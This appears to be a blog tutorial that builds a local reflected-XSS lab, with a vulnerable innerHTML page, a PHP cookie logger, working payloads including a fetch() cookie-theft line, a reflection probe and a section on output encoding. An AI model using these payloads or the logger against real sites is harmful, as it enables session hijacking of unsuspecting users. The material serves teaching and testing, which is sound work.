Reflected XSS: Explained with Real Examples

👾 Reflected XSS – Real-World Lab

Let’s dive into Reflected Cross-Site Scripting (XSS), a web vulnerability in which the application echoes attacker-controlled input back into a page, so that the attacker’s JavaScript runs in a victim’s browser with the vulnerable site’s origin. This lab simulates real scenarios, built for hands-on learning.


🚨 What is Reflected XSS?

Reflected XSS happens when data from a request (a URL parameter, a form field, a header) is echoed straight back in the response without validation or output encoding. Nothing is stored: the payload lives in the request itself, so the victim has to be lured into sending it, typically by clicking a crafted link.

🛠️ Example:

http://victim-site.com/page?q=<script>alert(1)</script>

If the app writes q into the HTML unencoded, the browser parses the reflected <script> tag as part of the page and runs it with the site’s origin, so it can read the DOM, any cookie that is not HttpOnly, and anything else the page can reach.
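
The reflection described above, as an added example that is not code from the original post: a minimal server-side render function of the kind the victim-site.com URL points at, the way a server framework decodes q out of the crafted URL, and the canary probe a tester runs to discover whether reflected metacharacters come back raw. The page markup, the parameter name q and the marker string zzq7 are assumptions made for this illustration.

```javascript
// Added example, not code from the original post: a server-side reflection
// sink (the kind of page the victim-site.com URL above points at) and the
// canary probe a tester runs to find one. The page markup, the parameter
// name q and the marker string are assumptions made for this illustration.

// Vulnerable: q is concatenated into the HTML body unencoded, which is what
// "outputs q without filtering" means in practice.
function renderSearchPage(q) {
  return '<!DOCTYPE html><html><body>' +
         '<h2>Results for: ' + q + '</h2>' +
         '</body></html>';
}

// Pull q out of a crafted URL the way a server framework does: the query
// string is percent-decoded, so %3Cscript%3E arrives as <script>.
function reflect(url) {
  const q = new URL(url).searchParams.get('q') ?? '';
  return renderSearchPage(q);
}

// Reflection probe: reflect a canary made of the HTML metacharacters wrapped
// in a marker, then report which of them came back raw. A raw '<' means a
// tag can be opened; raw quotes mean an attribute value can be broken out of.
// '&' is left out because an encoded response (&lt; ...) also contains it.
const MARKER = 'zzq7';                       // assumed unique marker
const CANARY = MARKER + '<>"\'' + MARKER;

function probeReflection(render) {
  const html = render(CANARY);
  const start = html.indexOf(MARKER);
  if (start === -1) return { reflected: false, raw: [] };
  const end = html.indexOf(MARKER, start + MARKER.length);
  if (end === -1) return { reflected: true, raw: [] };
  const echoed = html.slice(start + MARKER.length, end);
  const raw = ['<', '>', '"', "'"].filter(ch => echoed.includes(ch));
  return { reflected: true, raw };
}

// Constructed request: the example URL from the text, percent-encoded as a
// browser would send it.
const victimUrl = 'http://victim-site.com/page?q=%3Cscript%3Ealert(1)%3C/script%3E';

console.log(reflect(victimUrl).includes('<script>alert(1)</script>')); // true
console.log(probeReflection(renderSearchPage).raw); // [ '<', '>', '"', "'" ]
```

The probe is the first thing to run against any parameter that appears in a response: if all four characters come back raw, the HTML-body payloads in this post will work; if only quotes come back raw, look for an attribute context to break out of instead.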


🎯 Lab Goals

  • See how user input reflects in HTML
  • Inject XSS payloads manually
  • Steal cookies with fetch() to a PHP logger
  • Confirm captured cookies in terminal

🧱 Lab Structure

xss-lab/
├── xss-lab.html        # The vulnerable page
├── steal.php           # Attacker's logger
├── requests.log        # Log of captured cookies (created by steal.php)
└── cookie.txt          # Simulated browser cookie file

🧠 Lab Code

xss-lab.html

<!DOCTYPE html>
<html>
<head><title>XSS Lab</title></head>
<body>
  <h2>Reflected XSS Demo</h2>
  <div id="output"></div>

  <script>
    // Read the q parameter from the URL and write it into the page as HTML.
    // innerHTML is the sink: any markup in q is parsed and rendered.
    const q = new URLSearchParams(location.search).get('q');
    document.getElementById('output').innerHTML = q;
  </script>
</body>
</html>

Note that this page reflects q in the browser, not on the server: the parameter never reaches PHP, which makes it a DOM-based variant of the same bug. Also, a <script> element inserted through innerHTML is never executed by the browser, so payloads for this page must carry their code in an event handler, for example <img src=x onerror=...>. A server-side page that does echo $_GET['q'] straight into its HTML runs <script> payloads directly.

steal.php

<?php
// Append every query parameter of each request to requests.log.
// The "c" parameter carries the cookie sent by the payload.
file_put_contents("requests.log", print_r($_GET, true) . "\n", FILE_APPEND);

🚀 Run the Lab Locally

  1. Start a local PHP server from the xss-lab/ directory:

    php -S localhost:8080

  2. Open http://localhost:8080/xss-lab.html and set a fake cookie in the DevTools Console. Because it is set from JavaScript it is not HttpOnly, so document.cookie can read it later:

    document.cookie = "session_id=hello_mazal";

  3. Trigger the attack. The payload uses an onerror handler because a <script> tag inserted via innerHTML does not execute, and the + is written as %2B because URLSearchParams decodes a literal + in a query string to a space:

    http://localhost:8080/xss-lab.html?q=<img src=x onerror="fetch('http://localhost:8080/steal.php?c='%2Bdocument.cookie)">

  4. Check the log:

    cat requests.log

    Each hit is appended as print_r output:

    Array
    (
        [c] => session_id=hello_mazal
    )

The logger runs on the same origin here only for convenience. In a real attack it lives on the attacker’s host; CORS does not stop the request from being sent, it only stops the page from reading the response, and the attacker never needs the response.

💡 Test Inputs to Play With

To practice form-based reflection, add a GET form whose text field is named q, so submitting it reflects the value through the same sink (the browser percent-encodes the submitted value, so a + typed into the field arrives intact). The textarea and file input are extra fields to experiment with; the lab script only reads q.

<form method="get" action="xss-lab.html">
  <input type="text" name="q" placeholder="Search...">
  <textarea placeholder="Write a comment..."></textarea>
  <input type="file" accept="image/*">
  <button type="submit">Go</button>
</form>

βš”οΈ Payload Examples

  • Classic alert box:
    1
    
    <script>alert("XSS")</script>
    
  • Cookie theft:
    1
    
    <script>fetch('http://localhost:8080/steal.php?c=' + document.cookie)</script>
    
  • Image-based execution:
    1
    
    <img src=x onerror="alert('XSS')">
    
  • On-hover trigger:
    1
    
    <b onmouseover="alert('XSS')">Hover me</b>
    
  • Script via eval (dangerous if used):
    1
    
    "><script>eval('alert(1)')</script>
    

🧪 Testing Tips

✅ Test in the browser by entering payloads in the URL. For this lab use an event-handler payload, since a <script> tag written through innerHTML will not run:
http://localhost:8080/xss-lab.html?q=<img src=x onerror="alert(1)">

✅ Or check the logger on its own by triggering the fetch from DevTools and then reading requests.log:

fetch("http://localhost:8080/steal.php?c=" + document.cookie)

🔒 Validating & Sanitizing Inputs

  • Validate input against the pattern you expect (for example a regex for an email address); reject what does not match rather than trying to clean it up
  • Encode output for the context it is written into: in HTML text and quoted attributes that means escaping &, <, >, " and '
  • In client-side code, write untrusted data with textContent rather than innerHTML, so it is treated as text and never as markup

Example (PHP, server-side reflection into the HTML body):

echo htmlspecialchars($_GET['q'], ENT_QUOTES, 'UTF-8');
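
The encoding step above, as an added example that is not code from the original post: a JavaScript encoder equivalent to htmlspecialchars with ENT_QUOTES, the vulnerable concatenation beside its hardened form, and a check that runs the post’s own payloads through both. The function names are illustrative, the div wrapper mirrors the lab page, and the client-side textContent fix is shown as a comment because it needs a browser.

```javascript
// Added example, not code from the original post: the vulnerable concatenation
// beside its hardened form, using the same HTML-body encoding as
// htmlspecialchars($q, ENT_QUOTES, 'UTF-8'). Function names are illustrative;
// the payloads are the ones listed in the post.

// Encode the five characters that can change meaning in HTML text or inside a
// quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, ch => map[ch]);
}

// Vulnerable: untrusted q becomes markup.
function renderUnsafe(q) {
  return '<div id="output">' + q + '</div>';
}

// Hardened: the same page with q encoded for the HTML body context.
function renderSafe(q) {
  return '<div id="output">' + escapeHtml(q) + '</div>';
}

// The lab's client-side equivalent (browser-only, shown as a comment):
//   document.getElementById('output').textContent = q;   // text, never markup

// In the HTML body context an injection has to open a tag, and that needs a
// raw '<' followed by a letter. Everything between the div tags is what the
// page rendered from q.
function canOpenTag(html) {
  const inner = html.slice('<div id="output">'.length, -'</div>'.length);
  return /<[a-z]/i.test(inner);
}

// The post's own payloads, as constructed inputs.
const PAYLOADS = [
  '<script>alert("XSS")</script>',
  '<img src=x onerror="alert(\'XSS\')">',
  '<b onmouseover="alert(\'XSS\')">Hover me</b>',
  '"><script>eval(\'alert(1)\')</script>',
];

// Run every payload through a renderer; true means the output still contains
// injectable markup.
function audit(render) {
  return PAYLOADS.map(p => canOpenTag(render(p)));
}

console.log(audit(renderUnsafe)); // [ true, true, true, true ]
console.log(audit(renderSafe));   // [ false, false, false, false ]
```

The check is deliberately narrow to the HTML body context, which is the only context this lab has. If q were written into a JavaScript string, a URL, or an unquoted attribute, HTML entity encoding alone would not be sufficient and the encoder for that context would be needed instead.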

🔚 Final Thoughts

Reflected XSS is quick to exploit and dangerous: one crafted link can hand over a session. It is still common in bug bounty programs because output encoding is applied inconsistently.

✅ Always encode output for its context before rendering
✅ Test every input and every place it is reflected
✅ Use browser DevTools and manual payloads for testing


Stay curious, break safely, and document everything.
~ Maz4l 🤺


More hacks, more notes, more wins.

This post is licensed under CC BY 4.0 by the author.